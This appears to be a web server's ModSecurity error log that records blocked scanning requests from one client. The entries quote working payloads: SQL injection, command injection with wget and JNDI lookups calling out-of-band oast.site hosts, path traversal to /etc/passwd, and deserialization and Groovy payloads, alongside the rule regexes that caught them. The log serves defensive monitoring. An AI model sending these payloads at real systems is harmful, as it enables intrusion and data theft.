[Tue Aug 29 11:32:30.314095 2023] [:error] [pid 1038] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS:parent. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data: --  found within ARGS:parent: \\x22 UNION SELECT NULL,NULL,CONCAT_WS(0x203a20,USER(),DATABASE(),VERSION(),md5(999999999)),NULL,NULL,NULL,NULL,NULL-- aa"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repository.unla.ac.id"] [uri "/plugins/editors/jckeditor/plugins/jtreelink/dialogs/links.php"] [unique_id "ZO103sCo-f0AAAQOv94AAAAw"]
[Tue Aug 29 11:32:31.317741 2023] [:error] [pid 1085] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:SPOOLDIR. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:SPOOLDIR: test\\x22.system(id).\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repository.unla.ac.id"] [uri "/index.php"] [unique_id "ZO1038Co-f0AAAQ9H4IAAAAK"]
[Tue Aug 29 11:32:32.323921 2023] [:error] [pid 1038] [client 143.42.78.27] ModSecurity: Multipart parsing error: Multipart: Invalid boundary: ------WebKitFormBoundaryl7d1B1aGsV2wcZwF\\xe2\\x80\\x94\\r\\n [hostname "repository.unla.ac.id"] [uri "/"] [unique_id "ZO104MCo-f0AAAQOv@AAAAAw"]
[Tue Aug 29 11:32:32.323961 2023] [:error] [pid 1038] [client 143.42.78.27] ModSecurity: Access denied with code 400 (phase 2). Match of "eq 0" against "REQBODY_ERROR" required. [file "/etc/modsecurity/modsecurity.conf"] [line "54"] [id "200001"] [msg "Failed to parse request body."] [data "Multipart parsing error: Multipart: Invalid boundary: ------WebKitFormBoundaryl7d1B1aGsV2wcZwF\\x5cxe2\\x5cx80\\x5cx94\\x5cr\\x5cn"] [severity "CRITICAL"] [hostname "repository.unla.ac.id"] [uri "/"] [unique_id "ZO104MCo-f0AAAQOv@AAAAAw"]
[Tue Aug 29 11:32:32.325175 2023] [:error] [pid 1088] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:field. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:field: field:exec:head -1/etc/passwd:null:null"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "repository.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO104MCo-f0AAARA7ZoAAAAA"]
[Tue Aug 29 11:32:35.382515 2023] [:error] [pid 1088] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){8,}" at REQUEST_COOKIES:${jndi:ldap://127.0.0.1#.${hostName}.cookiename.cjmn8l5jmimk2adbbnlgoaxjcgqrd7tuh.oast.site}. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "157"] [id "981172"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: } found within REQUEST_COOKIES:${jndi:ldap://127.0.0.1#.${hostName}.cookiename.cjmn8l5jmimk2adbbnlgoaxjcgqrd7tuh.oast.site}: ${jndi:ldap://${hostName}.cookievalue.cjmn8l5jmimk2adbbnlg9p8hodi9muxae.oast.site}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "repository.unla.ac.id"] [uri "/"] [unique_id "ZO1048Co-f0AAARA7Z8AAAAA"]
[Tue Aug 29 11:32:36.365123 2023] [:error] [pid 893] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data:  'hsvT'='hsvT found within ARGS:username: 1@a.com' AND (SELECT 6427 FROM (SELECT(SLEEP(5)))LwLu) AND 'hsvT'='hsvT"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repository.unla.ac.id"] [uri "/login.php"] [unique_id "ZO105MCo-f0AAAN9sXEAAAAJ"]
[Tue Aug 29 11:32:37.423853 2023] [:error] [pid 1096] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:text. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:text: cat/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "repository.unla.ac.id"] [uri "/vendor/htmlawed/htmlawed/htmLawedTest.php"] [unique_id "ZO105cCo-f0AAARIwJIAAAAO"]
[Tue Aug 29 11:32:38.387349 2023] [:error] [pid 1096] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS:sccp_id[]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: SLEEP( found within ARGS:sccp_id[]: 3) AND (SELECT 5921 FROM (SELECT(SLEEP(6)))LxjM) AND (7754=775"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repository.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO105sCo-f0AAARIwJoAAAAO"]
[Tue Aug 29 11:32:38.445543 2023] [:error] [pid 1096] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:account_name. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /../../../ found within ARGS:account_name: /../../../var/www/php/2Udxk4kPA8EFcUByGpoyFb9vAvx.php"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repository.unla.ac.id"] [uri "/v1/backend1"] [unique_id "ZO105sCo-f0AAARIwJ0AAAAO"]
[Tue Aug 29 11:32:40.431238 2023] [:error] [pid 963] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:j_username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ://${:- found within ARGS:j_username: ${jndi:ldap://${:-654}${:-523}.${hostName}.postdata.cjmn8l5jmimk2adbbnlgt6haiesuqjwf9.oast.site}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repository.unla.ac.id"] [uri "/opennms/j_spring_security_check"] [unique_id "ZO106MCo-f0AAAPDoIUAAAAP"]
[Tue Aug 29 11:32:42.481648 2023] [:error] [pid 893] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:language. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:language: ../../../../../../../../../../windows/win.ini"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repository.unla.ac.id"] [uri "/tiki-jsplugin.php"] [unique_id "ZO106sCo-f0AAAN9sYAAAAAJ"]
[Tue Aug 29 11:32:46.443018 2023] [:error] [pid 1107] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:g. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /../../../ found within ARGS:g: core-r7rules/../../../hello.php."] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repository.unla.ac.id"] [uri "/photo/combine.php"] [unique_id "ZO107sCo-f0AAARTEJYAAAAG"]
[Tue Aug 29 11:32:47.555865 2023] [:error] [pid 1100] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:button. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x83\\x81\\x81[\\x83\\x8b\\x91\\x97\\x90 found within ARGS:button: \\x83\\x81\\x81[\\x83\\x8b\\x91\\x97\\x90M"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repository.unla.ac.id"] [uri "/conf_mail.php"] [unique_id "ZO1078Co-f0AAARMMeIAAAAR"]
[Tue Aug 29 11:32:47.599802 2023] [:error] [pid 1105] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data: \\x00 found within ARGS:file: ;echo CVE-2023-23333|rev\\x00.zip"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repository.unla.ac.id"] [uri "/downloader.php"] [unique_id "ZO1078Co-f0AAARR23AAAAAF"]
[Tue Aug 29 11:32:49.400870 2023] [:error] [pid 1095] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at XML. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: = found within XML: \\x0a\\x0a\\x0a\\x0a\\x0arO0ABXNyABtqYXZheC5tYW5hZ2VtZW50Lk9iamVjdE5hbWUPA6cb620VzwMAAHhwdACxV2ViU3BoZXJlOm5hbWU9Q29uZmlnU2VydmljZSxwcm9jZXNzPXNlcnZlcjEscGxhdGZvcm09cHJveHksbm9kZT1MYXAzOTAxM05vZGUwMSx2ZXJzaW9uPTguNS41LjcsdHlwZT1Db25maWdTZXJ2aWNlLG1iZWFuSWRlbnRpZmllcj1Db25maWdTZXJ2aWNlLGNlbGw9TGFwMzkwMTNOb2RlMDFDZWxsLHNwZWM9MS4weA==\\x0agetUnsavedChanges\\x0arO0ABXNyABFqYXZhLnV0aWwuSGFzaE1hcAUH2sHDFmDRAwACRgAKbG9hZEZhY3RvckkACXRocmVzaG9sZHhwP0AAAAAAAAx3CAAAABAAAAABc3IADGphdmEubm..."] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTA [hostname "repository.unla.ac.id"] [uri "/"] [unique_id "ZO108cCo-f0AAARH7KgAAAAM"]
[Tue Aug 29 11:32:49.544741 2023] [:error] [pid 1101] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:<?xml version. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22?> < found within ARGS:<?xml version: \\x221.0\\x22 encoding=\\x22ISO-8859-1\\x22?> <methodCall> <methodName>openads.spc</methodName> <params> <param> <value> <struct> <member> <name>remote_addr</name> <value>8.8.8.8</value> </member> <member> <name>cookies</name> <value> <array> </array> </value> </member> </struct> </value> </param> <param><value><string>a:1:{S:4:\\x22what\\x22;O:11:\\x22Pdp\\x5cUri\\x5cUrl\\x22:1:{S:17:\\x22\\x5c00Pdp\\x5c5CUri\\x5c5CUrl\\x5c00host\\x22;O:21:\\x22League\\x5cFlysystem\\..."] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repository.unla.ac.id"] [uri "/adxmlrpc.php"] [unique_id "ZO108cCo-f0AAARNk6oAAAAS"]
[Tue Aug 29 11:32:51.479478 2023] [:error] [pid 1107] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: union select found within ARGS:id: -1 union select md5(999999999)#"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repository.unla.ac.id"] [uri "/admin/ajax/avatar.php"] [unique_id "ZO1088Co-f0AAARTEKAAAAAG"]
[Tue Aug 29 11:32:59.318903 2023] [:error] [pid 1095] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:cycle. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ,(@@ found within ARGS:cycle: 1 UNION ALL SELECT 1,(@@version)-- "] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repository.unla.ac.id"] [uri "/glpi/scripts/unlock_tasks.php"] [unique_id "ZO10@8Co-f0AAARH7LEAAAAM"]
[Tue Aug 29 11:32:59.370366 2023] [:error] [pid 1101] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:cycle. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ,(@@ found within ARGS:cycle: 1 UNION ALL SELECT 1,(@@version)-- "] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repository.unla.ac.id"] [uri "/scripts/unlock_tasks.php"] [unique_id "ZO10@8Co-f0AAARNk7MAAAAS"]
[Tue Aug 29 11:33:00.295493 2023] [:error] [pid 1095] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:token. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: wget found within ARGS:token: `wget http:/cjmn8l5jmimk2adbbnlghrsphxgjun59d.oast.site`"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "repository.unla.ac.id"] [uri "/storfs-asup"] [unique_id "ZO10-MCo-f0AAARH7LwAAAAM"]
[Tue Aug 29 11:33:05.767923 2023] [:error] [pid 1105] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:value. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ')\\x0a@ found within ARGS:value: @GrabConfig(disableChecksums=true)\\x0a@GrabResolver(name='test', root='http://aaa')\\x0a@Grab(group='package', module='vulntest', version='1')\\x0aimport Payload;"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repository.unla.ac.id"] [uri "/securityRealm/user/admin/descriptorByName/org.jenkinsci.plugins.workflow.cps.CpsFlowDefinition/checkScriptCompile"] [unique_id "ZO11AcCo-f0AAARR25UAAAAF"]
[Tue Aug 29 11:33:09.408588 2023] [:error] [pid 1091] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data:  -- - found within ARGS:username: ' OR 1=1 -- -"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repository.unla.ac.id"] [uri "/classes/Login.php"] [unique_id "ZO11BcCo-f0AAARD1RsAAAAH"]
[Tue Aug 29 11:33:10.321304 2023] [:error] [pid 876] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:Form1. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: $ found within ARGS:Form1: $TextField$0,$Submit,$Submit$0"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "repository.unla.ac.id"] [uri "/app"] [unique_id "ZO11BsCo-f0AAANsAcAAAAAD"]
[Tue Aug 29 11:33:10.427133 2023] [:error] [pid 1105] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:Form1. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: $ found within ARGS:Form1: $TextField$0,$Submit,$Submit$0"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "repository.unla.ac.id"] [uri "/app"] [unique_id "ZO11BsCo-f0AAARR26QAAAAF"]
[Tue Aug 29 11:33:11.330487 2023] [:error] [pid 1107] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:type. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:type: |cat/etc/passwd||"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "repository.unla.ac.id"] [uri "/webadm/"] [unique_id "ZO11B8Co-f0AAARTELYAAAAG"]
[Tue Aug 29 11:33:12.536178 2023] [:error] [pid 1091] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS:docid. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: SLEEP( found within ARGS:docid: 1 AND (SELECT 6288 FROM (SELECT(SLEEP(6)))HRaz)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repository.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO11CMCo-f0AAARD1S0AAAAH"]
[Tue Aug 29 11:33:12.633127 2023] [:error] [pid 1095] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://cjmn8l5jmimk2adbbnlgogwcssz64jfur.oast.site found within TX:1: cjmn8l5jmimk2adbbnlgogwcssz64jfur.oast.site"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "repository.unla.ac.id"] [uri "/"] [unique_id "ZO11CMCo-f0AAARH7NkAAAAM"]
[Tue Aug 29 11:33:12.766596 2023] [:error] [pid 1105] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:(?:n(?:et(?:\\\\b\\\\W+?\\\\blocalgroup|\\\\.exe)|(?:map|c)\\\\.exe)|t(?:racer(?:oute|t)|elnet\\\\.exe|clsh8?|ftp)|(?:w(?:guest|sh)|rcmd|ftp)\\\\.exe|echo\\\\b\\\\W*?\\\\by+)\\\\b|c(?:md(?:(?:\\\\.exe|32)\\\\b|\\\\b\\\\W*?\\\\/c)|d(?:\\\\b\\\\W*?[\\\\/]|\\\\W*?\\\\.\\\\.)|hmod.{0,40}?\\\\ ..." at ARGS:hostname. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "221"] [id "950006"] [rev "3"] [msg "System Command Injection"] [data "Matched Data: `id found within ARGS:hostname: `id`"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "repository.unla.ac.id"] [uri "/controller/ping.php"] [unique_id "ZO11CMCo-f0AAARR27AAAAAF"]
